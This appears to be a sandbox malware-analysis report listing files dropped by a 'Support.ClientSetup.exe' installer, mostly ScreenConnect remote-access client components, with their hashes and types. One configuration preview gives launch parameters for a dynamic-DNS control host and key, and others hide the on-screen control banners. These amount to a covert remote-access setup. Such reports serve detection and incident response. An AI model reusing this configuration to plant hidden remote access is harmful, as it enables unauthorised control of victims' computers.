                                                                                                                                        MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                                                        SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                                                        SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                                                        SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):95512
                                                                                                                                        Entropy (8bit):6.504684691533346
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                                                        MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                                                        SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                                                        SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                                                        SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):548864
                                                                                                                                        Entropy (8bit):6.034211651049746
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                                        MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                                        SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                                        SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                                        SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1721856
                                                                                                                                        Entropy (8bit):6.639085961200334
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                                        MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                                        SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                                        SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                                        SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):260168
                                                                                                                                        Entropy (8bit):6.416438906122177
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                                                                        MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                                                        SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                                                        SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                                                        SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):61208
                                                                                                                                        Entropy (8bit):6.310126082367387
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                                                        MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                                                        SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                                                        SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                                                        SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):266
                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:
                                                                                                                                        <?xml version="1.0" encoding="utf-8"?>
                                                                                                                                        <configuration>
                                                                                                                                          <startup>
                                                                                                                                            <supportedRuntime version="v4.0" />
                                                                                                                                            <supportedRuntime version="v2.0.50727" />
                                                                                                                                          </startup>
                                                                                                                                          <runtime>
                                                                                                                                            <generatePublisherEvidence enabled="false" />
                                                                                                                                          </runtime>
                                                                                                                                        </configuration>
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):602392
                                                                                                                                        Entropy (8bit):6.176232491934078
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                                                        MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                        SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                                                        SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                                                        SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\msiexec.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):266
Entropy (8bit):4.842791478883622
Encrypted:false
SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):842248
Entropy (8bit):6.268561504485627
Encrypted:false
SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
MD5:BE74AB7A848A2450A06DE33D3026F59E
SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):81688
Entropy (8bit):5.8618809599146005
Encrypted:false
SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
MD5:1AEE526DC110E24D1399AFFCCD452AB3
SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\msiexec.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):266
Entropy (8bit):4.842791478883622
Encrypted:false
SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
Process:C:\Windows\System32\msiexec.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1970
Entropy (8bit):4.690426481732819
Encrypted:false
SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
MD5:2744E91BB44E575AD8E147E06F8199E3
SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
Malicious:false
Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
Process:C:\Windows\System32\msiexec.exe
File Type:XML 1.0 document, ASCII text, with very long lines (451), with CRLF line terminators
Category:dropped
Size (bytes):941
Entropy (8bit):5.772567198240879
Encrypted:false
SSDEEP:24:2dL9hK6E4dl/1Gu5Y9hyN2XUMtrPt3QevH:chh7HHZ5Y/u2XPruev
MD5:CF7081A6A703B834CD0EF188E43B33D7
SHA1:18B3D9ADFEF643F3F0B8308C22464FFD4CABA387
SHA-256:6122FA5E642ACB4222B755B40B394396663A00EEA27ABA38E236BC5DE07EDE64
SHA-512:A1DE293320C5063A6AD8BFB3DF196A3C68356FEA6B2F53CF4E1D5EFCA8B88F1E0DF15CD5B3A72FB024D679C4EF2B4DBB2AFC8CFC95E2927C923CB4F32110F5CF
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=fmt2as.ddns.net&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.40703853339446866
Encrypted:false
SSDEEP:1536:fJeHJFZnnJF9U7JFCRImvqnDskXZrtlpZpaSh5hmn91nzw7LkL4b2bBbP+GCFH+R:fJyyWGWnzwHkL4WLnQnHu
MD5:A8BF93F21FA6CEC79DC20FC2F117138E
SHA1:126C50EF2720FAF008A18CCBB1C9F563F424304F
SHA-256:A9FE5FFF5E081EF2952066CF1A4928475A919A48B09DA2765F3EDF8B0AAF660F
SHA-512:919DF5275D9BFFD75FD19396235B2326FEFD1EC23956895AC66974AB1A39ED7D8C6C620C10B4CCAB69D17DA111C9E8C75655C743A00F0248A695478A8B55331C
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc7da9bfc, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.5145200785042059
Encrypted:false
SSDEEP:1536:FSB2ESB2SSjlK/av9qn5hbkL4ShyUqn/qnJKYkr3g16HL2UPkLk+kY07Q8zAkUk4:Fazakv+hkL4c2L2ULz
MD5:DF06092F79086D8BE5D1619EAFEA673A
SHA1:16E658AE4AEDAB9ACCBCBA6919B02F0DD9D755E7
SHA-256:59953044355831AE8F1718EB6043D97021E5ED57757FD94C2A01A8B4926D8BB9
SHA-512:3692F693AB89ED38D5E7C43DF1F4B70897F736BA88C40F28169C75F8CD21502AA0BB8D8FE01409E165DC36DF4C24E809CB4325EF6BC68C862438F3EB475C7C95
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07906316199448007
Encrypted:false
SSDEEP:3:LW2KYe+AHrJjll/UWjHrJjOqHvjvJK8/Yllx8m9v/ll/TnK2:xKzzrJjllnjHrJj7jBKcIImlLK
MD5:A1D6233523549BE4203A2646004E8B3C
SHA1:FF12C011B8C7A16F321BA37047BE6182687A0E67
SHA-256:474824F749B071491DE4D1031A41156A0CAD15435D903A604FDCCC8FF3584261
SHA-512:1F5427DD9B6A8CD9F9067AE2EE93F46B3E138C09DB634A8AFD0DFDFF34544B0F38911CDA9A83B99960DDCB73E109D837602CDC7B1B90EAA7484A4FD11BA1C7D7
Malicious:false
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Category:dropped
Size (bytes):1088392
Entropy (8bit):7.789940577622617
Encrypted:false
SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
MD5:8A8767F589EA2F2C7496B63D8CCC2552
SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):234
Entropy (8bit):4.977464602412109
Encrypted:false
SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
MD5:6F52EBEA639FD7CEFCA18D9E5272463E
SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <startup useLegacyV2RuntimeActivationPolicy="true">
    <supportedRuntime version="v4.0" />
    <supportedRuntime version="v2.0.50727" />
  </startup>
</configuration>
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):49152
Entropy (8bit):4.62694170304723
Encrypted:false
SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
MD5:77BE59B3DDEF06F08CAA53F0911608A5
SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):36864
Entropy (8bit):4.340550904466943
Encrypted:false
SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
MD5:4717BCC62EB45D12FFBED3A35BA20E25
SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):57344
Entropy (8bit):4.657268358041957
Encrypted:false
SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
MD5:A921A2B83B98F02D003D9139FA6BA3D8
SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):176128
Entropy (8bit):5.775360792482692
Encrypted:false
SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
MD5:5EF88919012E4A3D8A1E2955DC8C8D81
SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):548864
Entropy (8bit):6.034211651049746
Encrypted:false
SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
MD5:14E7489FFEBBB5A2EA500F796D881AD9
SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):11776
Entropy (8bit):5.273875899788767
Encrypted:false
SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
MD5:73A24164D8408254B77F3A2C57A22AB4
SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1721856
Entropy (8bit):6.639085961200334
Encrypted:false
SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
MD5:9AD3964BA3AD24C42C567E47F88C82B2
SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Process:C:\Users\user\Desktop\Support.ClientSetup.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13361152
                                                                                                                                        Entropy (8bit):7.96791577882768
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:196608:/Wh0cGw1Wh0cGrWh0cG4Wh0cGYWh0cGFWh0cG6Wh0cGv:/WacjWaciWacnWacvWac4WacpWac+
                                                                                                                                        MD5:79C8B7ACB3CBBA8B53E909DF0398C465
                                                                                                                                        SHA1:A9A70E43426EAF014ED2BA59357793DC93FDDA6D
                                                                                                                                        SHA-256:DC653E5B6CAE498591A44DBCFBCFCED2E52C3B8E29384A8C63CE15A5F8B876F5
                                                                                                                                        SHA-512:E62494ED2B277F46960BF8A591B03D3E547C5930D11287DCC0B7A4B7C39E847BE7B386B6F5BE82E845FD47A699D6D07C5B2323DDE91D43D80205F233789CFAED
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>.......................................................|...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13361152
                                                                                                                                        Entropy (8bit):7.96791577882768
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:196608:/Wh0cGw1Wh0cGrWh0cG4Wh0cGYWh0cGFWh0cG6Wh0cGv:/WacjWaciWacnWacvWac4WacpWac+
                                                                                                                                        MD5:79C8B7ACB3CBBA8B53E909DF0398C465
                                                                                                                                        SHA1:A9A70E43426EAF014ED2BA59357793DC93FDDA6D
                                                                                                                                        SHA-256:DC653E5B6CAE498591A44DBCFBCFCED2E52C3B8E29384A8C63CE15A5F8B876F5
                                                                                                                                        SHA-512:E62494ED2B277F46960BF8A591B03D3E547C5930D11287DCC0B7A4B7C39E847BE7B386B6F5BE82E845FD47A699D6D07C5B2323DDE91D43D80205F233789CFAED
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>.......................................................|...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
